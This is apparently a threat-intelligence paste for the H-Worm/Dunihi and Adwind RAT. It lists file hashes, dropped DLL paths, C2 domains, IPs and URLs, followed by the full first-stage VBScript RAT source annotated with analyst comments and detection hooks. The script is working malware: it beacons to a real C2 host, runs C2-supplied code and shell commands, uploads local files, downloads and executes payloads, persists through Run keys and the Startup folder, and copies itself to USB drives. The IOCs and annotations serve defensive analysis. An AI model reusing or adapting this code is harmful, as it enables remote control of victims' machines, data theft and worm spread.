G0dR4p3

Dunihi_Adwin_RAT_IOCs_21-01-2019

Jan 21st, 2019
  1. #H-Worm #Dunihi #Adwin #RAT
  2. ---------------------------------
  3. 21-01-2019 IOCs
  4. ---------------------------------
  5. Main object- "9ed6f79853efcec2c6e17bb7def042f2b4373519b56f7b437ed85cf8d260b7cc.bin.gz"
  6. sha256 8f8e8b167a3a34c8bf4a99e2d0db589e6608a3789a7fc7deb3dfdc785de1e9cc
  7. sha1 d573a1d7482f9d8ad1b85725e1cc58c2034b3fdf
  8. md5 4a596594f3efc17edf98ad162f87e0cf
  9. Dropped executable file
  10. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\awt.dll e5d4fc7d47a38a389884af1ea5f06f7c61c5cde6afc154a23a3cb5a127da1e34
  11. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\decora_sse.dll adf4e9ce0866ff16a16f626cfc62355fb81212b1e7c95dd908e3644f88b77e91
  12. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_shmem.dll c417390f681276ec0d55d81a91b87eae75ca245045f5c23e9b43550b708fb1a6
  13. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\deploy.dll bff79fb05667992cc2bda9bae6e5a301baf553042f952203641ccd7e1fc4552d
  14. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\eula.dll dec4f2f32edc45f70e7119c9e52c4cef44bb9aa627dbec1ee70f61d37468556b
  15. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glass.dll a92df0e1f93e29fae427da766d9b91bda4b421e6ab86aeb9cdd060b218028d35
  16. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fontmanager.dll 20bef5bcd523cff21bad585af91d1c913d5535a6b20ac70f5f3d8dafb2f90f25
  17. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fxplugins.dll 1c78673777d1d48bf9e1e247bc64231817dccec4b08cc5e8c7a7fc5ae1f32501
  18. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dcpr.dll 80111e1d706741f5ef7f661835c3aa46664666425aa1b5f93103410f2bee1213
  19. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_socket.dll f0fd0268d6e410c05e7ee71ad9c96744cd5e4a97329f608041d7078faee24ed0
  20. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\bci.dll 7945365a3cd40d043dae47849e6645675166920958300e64dea76a865bc479af
  21. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcp120.dll 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
  22. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\klist.exe 298d8e2730a3dbe942ebe0379f7303bb2872fd7f05746851e47ed7588f541477
  23. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\keytool.exe 8c40c13f83ea7c95b441548a455b57edac019b1cbfd6c6a068ddad33a6476ff1
  24. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ktab.exe e89fe9520bcedbba20b5773598fb15e90dc828be7691adaa9d887ca585046aad
  25. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr120.dll 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
  26. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\mlib_image.dll bb13a4ea915965aca971da50d9b90cbc0a32c99900eb585c6e9e12232b448fef
  27. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\lcms.dll e179ace7a6d6cffeb7540d67ef56d86a96cd16c421154b0a8b499722a4e957d9
  28. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\management.dll 035121aee1e7f257c582837e1a0bd2e240bc1d1a791354a803e5fa165be22d87
  29. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr100.dll 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
  30. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kinit.exe 7cc34a5423bd3fc9fa63d20ebece4103e22e4360df5b9caa2b461069dac77f4d
  31. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jaas_nt.dll e700d076614943e138b69f4a1f177914225ca35b93fed8b43bc4a86cfd87c59c
  32. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\hprof.dll cc82beaa275f4ed4c33b694154bebc5fd097ada50072201d250aed3f269a41b6
  33. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\net.dll 6d9bd64084180b7f1b7aa4902372879dc0400905856ac0c229ad33218f3257f1
  34. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\nio.dll fb537564d240ac9b730941b5c0966209a5857e4d3ec0582ba0443fe391c74294
  35. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\policytool.exe d81308da68136fd421eb56fa2b586ec6801ccf0827d85f495227e6d6c40fc69e
  36. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\npt.dll 9145cb3b7fe40237e5c980404ade4c862d48e2d644aeba0006ec3a6f3e9505b5
  37. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\pack200.exe 3047b67b36aee78b669fdedfe423e750b125837d92abcdc06983c34c65db71fc
  38. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\orbd.exe 0f8cae56647464d75d2530cc9f7205c69911fced55e43a39d86ff4d435a018ed
  39. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_common.dll 5264316be4820cbc940e0c277698e6f95ec99a52023e5ef85c3fbe624b45cdaf
  40. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glib-lite.dll 465541ef4e9337108b375984c23f5d31e6c060fed16820bb9bc5af79a2109eac
  41. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_sw.dll 3f976b7efc9fe59abfe0bcde0d3b5af1cf133c64ad1508cb4a00cf2c104f5e81
  42. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\gstreamer-lite.dll 379a14d561afeb364f8902c0b5193da229882c6273f2793339e1ad682af516f4
  43. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_d3d.dll f9108ac2555dbc5a6b43cc9504394089be60eae4127397dc651e06b3e7585b00
  44. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pkcs11.dll 91b6e445f5b4510c9d66641b1eed925f54dc2e84f3ddb0ff16ed5b0ac4bdc977
  45. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jabswitch.exe a764db727ed6ec056ffe163dbb83db0ad0bd15b83181288c3afcd17a35e7d587
  46. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.exe df24b51772ff4959e9bbfe481f72f0e88ba6e7c031d60edb3b1a47c69f69a6d0
  47. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.exe e7521e54f241e99bb5f7f2de1cd2fc49f3980dc43eb6c5b8fa251178f03616ef
  48. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll 33fe38e43821c7e7d3b46317fab571926174492affd576f6ecd06bffe7a7c1b7
  49. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pcsc.dll 7a9f32ecba3dcaeb653293780812969e2534da7b8e652a24e56271cd088c7a36
  50. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll ed68df1e549a092674259b1f806a31839ca426572020a7dbe0c46e492b272ec9
  51. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.cpl e3259bb7ef907c0bb74e192e40e57fdf96c903bbc580975348dfef42839669ff
  52. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font.dll eada27806ccbf4d015f35f369b6880ef3dcc2eaa3b1ca89546fbdba8b05d9b5c
  53. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.dll 30a048a35865ca5bcea35ebecf7f01f08e8d20b0c4a3e9e0132540815eda1d89
  54. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java-rmi.exe 2ba8cd9a3757ecf0b8b7de612d7f827de73f7e9da114b1979fe9d429a46f8109
  55. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\instrument.dll 1a1d2c51b3db4507e4a4ad3e5afb6728e69acf9905d3df7c9dc5adbe83f7e96e
  56. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java_crw_demo.dll b34e72996d2c1a9b74a932c6259256b9001b73b3e7ef8c484afb61ff2517fba3
  57. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jawt.dll b11633c87ac49873d1e8ef5bcf9335dbe0579f483b5c745c0034f79b3fd0ae8c
  58. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfxmedia.dll e62ec519aff414c1a81aeeb4cbf6de348b3b52ae527f14cedd42449e61fb1548
  59. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll 8019cd10ef1a1ddae179364934d1a0304cfcfc67be2dd7bca4ee8def93a89ef4
  60. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaw.exe 11054aa4170990ad1d345a2caf15285f3157e4bf240015cc20431b7373a52fc2
  61. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaws.exe 3514c54f5d552b2cb64b9e2f8d8c5f65807e1d49fe82689a16f6a3e7521fb437
  62. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_iio.dll e880cd6207c687437dd2ca60008ea375bd99b1c07075674cad1052f41b631a97
  63. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfr.dll 28da2d3e61a12408b8d9f86398f9c78f551e48404bd2c7bdccd8cbd74ed5e5a3
  64. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jdwp.dll f9a0e87300c8d094bb45834dd128e70a49d6d5d2cef20133411a769c01195c04
  65. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2launcher.exe d8e40564694d5a2fdd85ab5345d8589e637e387d59160a74737832670da01597
  66. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jjs.exe c4916ed2eefc2ae2394625691f5550142eda6cb33e5e713d1e203b76b2141509
  67. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2iexp.dll 5cd202cd92f33cbad11898331dec0791bf0bccf8ddf22849942debde007c3317
  68. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmid.exe 6513c40184d496e86e34e327c960b06d20900c3092084a708d890f5376c43cf5
  69. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jpeg.dll 8cf3344453c02bf21ff8c79a6189f25617ca38cee2632766d0aa4ee07277bc25
  70. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jli.dll 45c6aa5006ebaf8ab63f26134f2753bf4f20497942de58bc734e437e2d0f32f6
  71. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\resource.dll 15b4fdfe5ddb1820ddc468ac5d0e65045ca6aaea21d3a5a66ecaa8fc1ce48835
  72. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kcms.dll 0ecd837ae93404f0aacfa6efc20f3c3ce6d1ae683e60a1c8873f07bfc8f93dc4
  73. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2ssv.dll e5328bcaec7fdba85097c04d5f4f35f648753b3378fb1d9ee6ce6965b9562e90
  74. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2native.dll f5faf9f49ca7f199f572e4227896ae839596cc9f6039875f3fa3a0eaddc40084
  75. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsoundds.dll b534c43f203c5502e43a5d0fdbfbd9422de342aade635009fab791eb82f3c020
  76. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\splashscreen.dll a6ea1b705acdda1bb3cd1c3cdcbfe7c86c81654537db8b48f65a781578ffbd77
  77. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\verify.dll 266d7992f7518b7cda33ba5251b0636b00ee13e6b17021311dcc1ba4dd2fc705
  78. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssv.dll 5eb2d05ffc733e7ec63cb271201f87c7724793e5b92b875551ced1cebb505f3f
  79. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsound.dll 5303366d9447a7610bd971339f27333767d399fca0a3f01154b082d47bd0a46e
  80. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssvagent.exe 4ada2d738b490cc63f3c18f151239dfde615af8a4eaf44b8021642ff9a25b8f2
  81. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack200.exe a6316854fe790d22e6264ee3abc3be49686e6e36299c9718be9a20bb3e9fb185
  82. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack.dll 2864b031237c6a68eedab256732e43558b5741ae4f68a07a068438469ad907d9
  83. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\servertool.exe bbe145615886dbb3f4ada7617d1a15fe2aee6cea5dbe34e9c216d1bde1121891
  84. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\zip.dll 9a7251883229ccc36859b02894b541a369c2426a9b5cbdc7e8a10db36f13451e
  85. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsdt.dll fe5d22121d6a683bb87b362da85cabf8aead1c171d347d0a16da64c74dd8a3bc
  86. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\t2k.dll d66f567fc2a33434063731832719cad75418c619dd30dcf6c339d2d3da32c7bb
  87. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll 699e5ff6df1060df61a32e99c8fc52837f40f774bfa88136af10036f4dd4a578
  88. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\tnameserv.exe 9f37d44545726fb5aeb03285d3866266322b833cd1a1fde340497c7d9358f775
  89. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunmscapi.dll 9c235bbfa97e6a8fc7e09a4ac12f84c8ed8855998410e96dd44e1b64ef951a80
  90. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll 161f737f9c90e67f0fb80e7cd9d6823f83bdd1d971108faa99c6088c278a4f2a
  91. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\wsdetect.dll a78345586e443e0adc6554951946ad874f61ba2ff724fa8121df546a4b21df4a
  92. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmiregistry.exe ba2d5038501cf3f3a31616a122f6cd2554d13219e717ef89c6aa1a07eb1cc145
  93. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunec.dll 23b40cf8e64e1a262ef9ff5b9e01246c082eeaa6039b4b05f92e1bd536bd7166
  94. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\client\jvm.dll 156afc715e865695ddf69d4a7db5fea2023b39748febfd86add15e9498c26639
  95. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll adaaa9037be30c708865a6627df9c0e43acf93d100469e5fdf83f632d2fe1829
  96. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll 62248d7ab742e200996bf87433b4e8478e4d8bcfbc0a2ee7cbe3a5a62f6268c3
  97. sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll d1deaa4b7feebfeed58eda969c9fb9bc5791ad7e67f47c596280375cbda3f46f
  98. sha256 C:\Users\admin\AppData\Local\Temp\Windows8381702355763314501.dll a6be5be2d16a24430c795faa7ab7cc7826ed24d6d4bc74ad33da5c2ed0c793d0
  99. DNS requests
  100. domain freshguys.ddnsking.com
  101. domain xtkd.ddns.net
  102. Connections
  103. ip 194.5.99.53
  104. ip 113.11.252.97
  105. HTTP/HTTPS requests
  106. url http://freshguys.ddnsking.com:5674/is-ready
  107. url http://xtkd.ddns.net:3233/is-ready
  108. url http://freshguys.ddnsking.com:5674/is-sending%3C%7C%3EC:/Users/Business/Desktop/adk.jar
  109. -------------------------------------------------------------------------------------------------------------
  110. [1st .VBS dropper]
  111. -------------------------------------------------------------------------------------------------------------
  112. [Dunihi]
' Analyst notes: 1st-stage .VBS of the sample above. The code matches the widely published
' H-Worm / Dunihi (Houdini) builder output; "pashinta" is the operator/variant tag.
' The script is a full RAT: it persists via Run keys + Startup folder, copies itself to
' removable drives, and polls an HTTP C2 every few seconds for commands.
'pashinta
' --- C2 configuration: every beacon is POST http://host:port/<command> (see function post) ---
host = "freshguys.ddnsking.com"
port = 5674
installdir = "%temp%"
' Gates for the LNK-hijack branches in sub install; both are off in this build, so
' removable-drive spreading only drops a hidden+system copy of the script.
lnkfile = false
lnkfolder = false


dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


' installname is the script's own file name; all persistence paths and the Run-key value
' name (installname without extension) are derived from it.
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
' Field separator "<|>" used in every C2 exchange; it shows up URL-encoded (%3C%7C%3E) in the
' is-sending URL listed in the IOCs above and is a usable network signature.
spliter = "<" & "|" & ">"
' Beacon interval in milliseconds (5 s); the C2 can change it with the "sleep" command.
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

' Errors are suppressed for the rest of the script: failed steps are silently skipped.
on error resume next


' instance: USB-origin marker in HKLM, persistence (upstart), relaunch from installdir,
' and a file-handle lock (oneonce) that makes a second copy exit.
instance
' Main C2 loop: each iteration re-runs install (persistence + removable-drive copy), polls
' /is-ready, and dispatches on the first "<|>"-separated field of the response.
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
' "excecute" (sic, this spelling is the wire protocol): C2-supplied VBScript runs in-process.
case "excecute"
param = cmd (1)
execute param
' "update": replaces the installed script body with C2-supplied content and relaunches it.
' The handle held by instance (oneonce) is closed first so the file can be rewritten.
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
' "send": fetch a file from the C2 and run it (download); "site-send": same from any URL.
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
' "recv": exfiltrate a local file to the C2 (upload).
case "recv"
param = cmd (1)
upload (param)
' Enumeration results are returned through post to the is-enum-* endpoints.
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
' "cmd-shell": runs a command via %comspec% and posts its output.
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
' "sleep": the new interval is a C2-supplied expression passed through eval.
case "sleep"
param = cmd (1)
sleep = eval (param)
end select

wscript.sleep sleep

wend
  199.  
  200.  
' install: re-applies persistence (upstart) and copies the script to every ready removable
' drive (drivetype = 1) as a hidden+system file. With lnkfile/lnkfolder enabled it would
' additionally hide each file/folder on the drive and replace it with a .lnk that launches
' the script and then the original item (classic USB worm behaviour).
' Detection hooks: wscript.exe writing to a removable drive root; .lnk files whose target is
' cmd.exe with "/c start ..." arguments; files on removable media with attributes 2+4 set.
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if drive.isready = true then
if drive.freespace > 0 then
' FileSystemObject DriveType 1 = removable.
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
' attributes 2+4 = Hidden + System.
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
' File hijack branch; skipped entirely in this build because lnkfile = false.
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
' windowstyle 7 = minimized; the shortcut runs cmd.exe, starts the script, then the real file.
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
' Looks up the registered DefaultIcon for the file's extension so the .lnk looks like the original.
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
' Folder hijack branch; skipped in this build because lnkfolder = false.
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
  265.  
' uninstall (C2 command "uninstall"): removes both Run-key values, the Startup-folder copy
' and the running script file, then undoes the removable-drive changes (deletes the dropped
' copy and generated .lnk files, clears hidden/system attributes) and exits.
' Note for responders: it only cleans the drives present at that moment and does not remove
' the HKLM\software\<name> marker written by instance, nor the copy in installdir.
sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
' DriveType 1 = removable.
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
' attributes 0 = normal; restores the files hidden by install.
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
' Any remaining .lnk on the drive root is deleted, whether or not install created it.
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
  305.  
' post: synchronous POST of param to http://host:port/<cmd>; returns the response body
' (or param itself if the request never completes, since errors are suppressed globally).
' The victim fingerprint from information() is carried in the request header. Note the header
' name is sent as "user-agent:" (with a trailing colon) — a malformed header that is a
' distinctive network signature for this family.
function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
  314.  
' information: builds (once, then caches in the undeclared global inf) the "<|>"-separated
' victim fingerprint sent in every beacon header:
'   hwid <|> %computername% <|> %username% <|> OS caption <|> "plus" <|> AV names <|> usbspreading
' "plus" is a hard-coded variant marker; usbspreading is the registry marker set by instance.
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter

' WMI query for the OS name; only the first row is used.
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
  336.  
  337.  
' upstart: persistence. Writes a Run value named after the script (extension stripped) under
' both HKCU and HKLM with the command  wscript.exe //B "<installdir>\<installname>"  and copies
' the script to installdir (%temp%) and to the user's Startup folder. Called from instance
' and again from install on every loop iteration, so deleting the artifacts alone does not
' stop re-persistence while the process is alive.
' Detection hooks: Run-key values whose data starts with "wscript.exe //B"; wscript.exe
' writing into the Startup folder.
sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub
  347.  
  348.  
' hwid: victim identifier used as the first beacon field — the VolumeSerialNumber of the first
' Win32_LogicalDisk that has one (usually C:). Stable across reboots, so the C2 can track hosts.
function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
  361.  
  362.  
' security: reports installed AV products to the C2. Picks the WMI namespace
' root\SecurityCenter2 (OS major version > 6 per the string built below) or root\SecurityCenter,
' queries AntiVirusProduct and joins the display names with " ."; returns "nan-av" when the
' query yields nothing. Observation: the loop variable is x but versionstr is indexed with i
' (never assigned), and colitems.version is not a valid property on the collection — with
' on error resume next these lines are silently tolerated, so the OS-version branch is unreliable.
function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
' flags 48 = ReturnImmediately | ForwardOnly.
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
  389.  
  390.  
' instance: first-run bookkeeping and single-instance enforcement.
'  1. Reads/writes the marker HKLM\software\<installname without ext>\ (default value) as
'     "true - <date>" when the script was launched from a drive root (i.e. from removable
'     media, the USB-spreading path) or "false - <date>" otherwise; the value is reported to
'     the C2 through information().
'  2. Runs upstart (Run keys + copies).
'  3. If this process is not running from installdir, launches the installed copy hidden
'     (wscript.exe //B) and exits.
'  4. Opens the installed copy for append (mode 8) and keeps the handle in oneonce; if the
'     open fails — another instance already holds it — this instance quits.
' The HKLM marker is a useful forensic artifact: it records the first-run date and origin.
function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
' mid(scriptfullname,2) = ":\<name>" means the script sits directly in a drive root.
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"

end if
end If



upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
' Mode 8 = ForAppending; the open handle acts as a mutex on the installed file.
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
  419.  
  420.  
' sitedownloader (C2 command "site-send"): downloads fileurl with a GET, saves it as
' installdir\filename (any existing file of that name is deleted first) and executes it.
' This is the generic "fetch and run a second-stage payload" primitive; in the analysed
' sample the dropped stage is the Adwind/JRAT Java payload seen under %AppData%\Oracle above.
sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
dim objstreamdownload
' adodb.stream type 1 = binary.
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
' Runs the payload via its 8.3 short path.
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
  450.  
